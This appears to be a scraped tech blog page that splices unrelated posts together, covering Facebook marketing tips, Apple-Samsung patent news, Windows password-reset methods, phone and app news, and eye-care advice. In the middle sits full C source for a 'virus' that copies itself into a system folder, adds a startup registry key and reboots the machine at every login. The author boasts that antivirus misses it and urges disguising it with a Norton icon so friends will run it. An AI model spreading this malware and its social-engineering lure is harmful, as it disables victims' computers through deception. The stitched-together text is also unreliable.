10 Ways to Grow Your Facebook Following :-

#1: Connect With Other Page Managers
This is a powerful tactic to a make a live connection with other Page admins who have a similar demographic to yours and cross-promote each other.

So if you are an ice cream store with a Facebook Page, make a live connection with the pizza parlor in your neighborhood that draws the same clientele (you may already know the owner of the pizza parlor). Then talk to him or her about doing a little Facebook cross-promotion and share each others posts with your audiences every once in a while.

Joint ventures also help forge these meaningful connections. Host a webinar with another company that has a similar audience.  This can be a great way tobecome visible to their audience.

#2: Share Original Content
Content is still king and when people share your content, your Page name travels with it. Think of new ways you can add original photos as part of your content.

Maybe it’s a screenshot from a hot tip. Or maybe it’s a photo from something happening behind the scenes at your business that you ask people to caption. Or you can add an inspirational or thought-provoking quote to a photo.

Just make sure you are following photo copyright laws. Notice how this photo is also branded with the name of the blog.

#3: Tag Your Page From Your Personal Profile
Make sure it’s easy for your friends to like your Page. As we know, Pages are not being seen as much in the news feed, so what is a page owner to do?

I recommend you post about your business occasionally on your Personal Profile. If you tag your Business Page (type “@” and then start typing your Page name until you can select it from the drop-down menu that appears) rather than share the status, people who mouse over your Page name in your post can easily like the Page right from your update.

#4: Link Your Profile to Your Page
This is a very simple thing to do, yet I see so many people skipping this step. If users are searching and finding your Personal Profile on Facebook, you want to make it as easy as possible for users to find your Business Page as well.

When people list where they work and it’s not properly linked to their Facebook Page, a strange “Community Page” is created with that same name and it has a suitcase icon. Then people start liking that Community Page rather than your real Facebook Page.

All you need to do is to delete the Community Page from your Work and Education section in your About area (click Edit in the About section), then add in the correct Facebook Page.

#5: Add Facebook in Your Email Signature
How many emails do you send each day? Again, this is not rocket science—just consider this tip as your gentle reminder to add a link to your Page in your email signature. Many email programs such as Gmail make it easy to customize your email signature with clickable icons.

#6: Comment (Thoughtfully) on Other Pages as Your Page
This is a great way to get more exposure for your Business Page with a target audience. Participate on other Pages where your audience is already having conversations. Find complementary Facebook Pages and like them as your Page, then watch your Page home feed and comment on the posts.

Use Facebook as your business the same way you use it personally: by interacting and having conversations as your Page.

Remember to add to the conversation and authentically build relationships. That will lead to those meaningful connections I mentioned in point #1.

This activity takes time and you may find that you only have 10 minutes a week to do this. But it’s a good habit to get into to get more visibility for your Page.

#7: Run a Contest
Running a contest can be a great way to get new likes on your Business Page. It does cost some money to run a contest, but hopefully you have a marketing budget for your business.

Many of the apps that are available for Facebook contests (and you MUST run a Facebook contest through an app) are not too expensive and are easy to set up yourself.

Running a contest is also a great way to promote your product or service in a fun way. Running a contest with a like-gate on your contest app also gives you the ability to make sure people like your Page before they enter. And it’s a great way to get folks on your email list to come over to your Page to like you and enter your contest. Who’s the winner here? It’s you.

#8: Add a QR Code to Your Business Card
How many business cards do you give out? Make it easy for the people you have connected with in person to connect with your Page. Creating a QR code is easy and free at sites like Kaywa and QRStuff.

Use the link for your Facebook Page and you have automatically created a QR code that you can add to the back of your business card.

#9: Advertise Your Page on Facebook
Today there are many options for advertising on Facebook. To get the best value for generating new likes for your Page, I would suggest you use a Sponsored Like Story. This will advertise your Page to friends of your current fans and give social proof in the ad by showcasing that the user’s friend likes your Page.

Sponsored Like Stories can be a bit cheaper to run, but you won’t have any ad copy to help convert people into fans. Hopefully seeing that their friend likes you is a sufficiently compelling reason.

Your Sponsored Like Story will be targeting the friends of your fans, but you can also use the regular Facebook targeting features to narrow the audience to your perfect demographic.

It’s easy to create your ad and limit your budget so you know how well it works before spending an arm and a leg.

#10: Add a Like Box to Your Website
In the Business Pages I have seen, a Like Box is one of the largest sources of likes for the Page if the website gets good traffic. It’s very easy to add a Like Box—just go to the Facebook Developers site, add the URL of your Facebook Page, configure the settings for how you want your Like Box to appear and click Get Code.

You will now have a choice among HTML5, XFBML, iFrame or URL. For most WordPress sites, you can choose HTML5, XFBML or iFrame for your code. But your WordPress theme may affect your choice. In this case, the easiest thing to do is to paste the code into a text widget on your sidebar.

Another Apple patent called into question in dispute with Samsung

Another of the patents Apple relied on in a $1 billion infringement lawsuit against Samsung Electronics has been called into question by the U.S. Patent and Trademark office (USPTO). The move, if not successfully opposed by Apple, may help Samsung in its appeal against the judgment.
The USPTO announced in a letter dated Dec. 19 that it has tentatively rejected all 21 claims of U.S. patent no. 7,844,915 on "Application programming interfaces for scrolling operations," also known as the '915 patent.
[ Simon Phipps tells it like it is: Why software patents are evil. | Stay ahead of the key tech business news with InfoWorld's Today's Headlines: First Look newsletter. | Read Bill Snyder's Tech's Bottom Line blog for what the key business trends mean to you. ]
All 21 of the patent's claims were rejected on the grounds that they were either obvious or invalidated by prior art as described in three earlier patents and four published documents.
Apple has two months to respond or the rejection will become final.
The letter was disclosed to interested parties by the patent office and submitted by Samsung to the U.S. District Court for the Northern District of California, San Jose Division, where its appeal against the $1 billion judgment is being heard. Samsung said the USPTO's decision was relevant to its appeal because all claims in the patent had been rejected, including claim 8, the only one at issue in the trial.
Apple and Samsung both declined to comment on the USPTO's ruling.
It is the third Apple patent in recent months to be tentatively rejected by the USPTO following an "ex parte" request for re-examination.
Another of the patents at issue in Apple's Aug. 24 victory over Samsung was no. 7,469,381 on "List scrolling and document translation, scaling and rotation on a touch-screen display," also known as the "overscroll bounce" or '381 patent. The USPTO issued an "office action" on Oct. 15 saying it intended to reject that patent because it had found evidence of prior art.
On Dec. 3 the USPTO issued a similar action in respect of patent no. 7,479,949 on "Touch screen device, method, and graphical user interface for determining commands by applying heuristics" (the '949 patent). That patent was not involved in the case decided on Aug. 24, but with three other patents gave the U.S. International Trade Commission grounds to issue an injunction against imports of a number of Samsung smartphones in October.

How to reset Windows administrator password?

Hey guy's I'm came with a new trick  , just look it out it's a cool trick, check it out
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which
it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
You do not need to know the old password to set a new one
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps......

"TAKE CARE OF YOUR EYES WHILE USING PC"

During a recent visit to an optician, one of my friend was told of an exercise for the eyes by a specialist doctor that he termed as 20-20-20. It is apt for all of us, who spend long hours atour desks
, looking at the computer screen.
I Thought I'd share it with you.
20-20-20

Step I :-
After every 20 minutes of looking into the computer screen, turn your he
ad and try to look at any object placed at least 20 feet away. This changes the focal length of your eyes, a must-do for the tired eyes.

Step II :-
Try and blink your eyes for 20 times in succession, to moisten them.

Step III :-
Time permitting of course, one should walk 20 paces after every20 minutes of sitting in one particular posture. Helps blood circulation for the entire body.
Circulate among all if you care. They say that your eyes are mirrors of your soul, so do take care of them, they are priceless.

About creating a virus :-

This time i came with a new trick that  will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operatio
ns. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

Make greeting cards with this iPhone app:-

From Christmas trees to Christmas cards, December is a pretty deadly season for trees. There's not a lot you can do about the Christmas trees (aluminum tinsel tree anyone?), but you can cut down on the cards.

An iPhone app, Over, lets you put type on top of your own photos. Although it wasn't intended with holidays in mind - more like a chance to make your own memes - it's an easy way to make cards the way photo studios used to ages ago.

There are other similar apps, but few if any are as simple to use and as versatile as Over. To get started, open the app and tap on "take a photo," or "camera roll," to take a photo or choose an existing shot. Sample text tells you to double tap to edit. Once you do that, type in your message and then choose the colour you would like your type to be. A yellow triangle on the right-hand side of the photo lets you pick a font and size it. You can move the writing around by dragging it with your finger.

When you are happy with your choices, you can save the photo or go directly to "share" and post your work on Facebook, Twitter, Tumblr or Instagram, or send by email.

Bigger is better say's Samsung new Samsung note 3:-

According to the Korea Times, Samsung is trying to put a 6.3-inch display in the next iteration of the Galaxy Note. The Galaxy Note II, which launched relatively recently, debuted with a 5.5-inch display, already a step up from the original Note’s 5-inch screen.

Bigger is apparently better.

The Galaxy Note, just in case you’ve missed the hullabaloo over the past year or so, is Samsung’s combination of a phone and a table
t.

It comes with an S-pen, a glorified pressure-sensitive stylus, and has a massive display to let users draw, make notes, etc. as if they were on a tablet. At the same time, it comes with all the greatness of an Android smartphone.

Korea Times claims that officials from local parts suppliers have confirmed the 6.3-inch display, though Samsung hasn’t made anything official yet so this is still considered a rumor in my book.

The Galaxy Note saw surprisingly good sales, and the same should be true of the second-generation model, which is available now. It only makes sense that Samsung would push the brand as quickly as possible, but does a bigger display a better Galaxy Note make?

Time, and sales, will surely tell.

In related news, Korea Times also claims that Samsung is currently working on the Galaxy S IV. We originally thought it would make its debut at CES in January, but it turns out that a MWC debut in Barcelona in February is much more likely. Or so states the Korea Times.

Google’s New Data Highlighter Lets You Add Structured Data To Your Sites Without Touching Any Code:-

Google wants website owners to add as much structured data to their sites as possible in order to improve its search results and Knowledge Graph boxes with rich snippets like event listings, reviews and other information. Adding this kind of metadata to a site, however, isn’t always trivial, and many small businesses don’t really have the expertise to add microdata or RDFa ma
rkup to their sites.

Starting today, however, you won’t have to fiddle with your code to report this data to Google. The company’s new Data Highlighter now offers a point-and-click tool for tagging your site to its specifications without having to touch any code.

For the time being, this tool is only available in English and only for structured data about events like concerts, sporting events, and exhibitions. Google promises to expand this project to other data types and languages in “the months ahead.”

Nokia Says Class Action Lawsuit Over Windows Phone Is Now Dismissed, No Compensation Paid :-

Nokia may be struggling to reach a critical mass of users to adopt its Windows Phone-based smartphones instead of Android or iPhone devices, but today it got a little light relief in its bigger battle: it’s had a class action suit over its choice of the Windows Phone platform formally dismissed, with no compensation paid.

“After further investigation, the plaintiffs have agreed to di
smiss the case against all defendants without any compensation being paid to any plaintiff or their counsel by any defendant,” Nokia notes in a statement. “The complaint has been withdrawn and dismissed with prejudice by the court.”

The case, Chmielinski v. Nokia Corporation, was first filed in the U.S. District Court for the Southern District of New York on May 3, 2012. At the time, Nokia had already said the case had no merit and that it would seek to fight the charges: the plaintiffs alleged that Nokia had overplayed how well Windows Phone and Lumia devices would do.

Nokia, they said, had claimed that Microsoft’s Windows Phone platform adoption would halt sales declines at the company. But a month before the suit was filed, Nokia had to issue a warning to investors that it would be reporting lower-than-expected device sales.

It’s a small victory but perhaps a significant one as the company continues to work hard at both selling more Lumia/Windows Phone devices, and also at convincing investors and the wider public not to lose all faith in the company. Nokia has also faced several ratings downgrades by the credit agencies, concerned also over declines in the company’s core business of handsets.

Is Windows 8 the Answer to Consumerization of IT Woes?

In the minds of many mobile watchers, Android was supposed to win the enterprise while Apple's iPad would remain the darling of consumers, but it hasn't played out that way. The curren
t state of affairs may leave Microsoft an opening.
"Kind of contrary to the conventional wisdom, Apple's focus on the enterprise is netting results," says Michael King, director of Enterprise Strategy for Appcelerator, provider of multi-platform tools for mobile app development.

1. Open the command prompt (Start->Run->type cmd->Enter)

In the latest episode of the Apple vs. Samsung legal drama that’s been playing out in the U.S. district court of Northern California, the pair met again at an appeal hearing on Thursday to argue their respective corners. Judge Lucy Koh is reviewing the jury’s $1.05 billion verdict against Samsung.

Apple is hoping for a ban on the sale of Samsung devices the jury deeme
d to infringe its patents when they returned their verdict back in August, while Samsung wants to reduce the damages award against it — or trigger a new trial.

The judge made a plea for “global peace” between the warring gadget makers — who are also doing battle in other courtrooms around the world. “If there is any way this court can facilitate some sort of resolution, I’d like to do that,” the FT quotes Koh as saying. “I think it would be good for consumers and good for the industry.”

Apple recently settled its remaining legal disputes with another mobile maker, HTC — by agreeing a licensing deal — an outcome Koh is likely hoping could be used to end the Apple vs. Samsung battle.

According to the BBC, Samsung’s arguments on Thursday focused on calling into question the jury’s calculations when it determined the amount of damages. To counter this argument, Apple urged the Judge not to probe the jury’s reasoning on a device-by-device basis — however Koh did not appear to be swayed by Apple’s argument. ”I don’t see how you can look at the aggregate verdict without looking at the pieces put together to make that verdict,” she is quoted as saying. ”If there is a basis to uphold the damages award, by the record, then I am going to uphold it. But I think it is appropriate to do analysis by-product.”
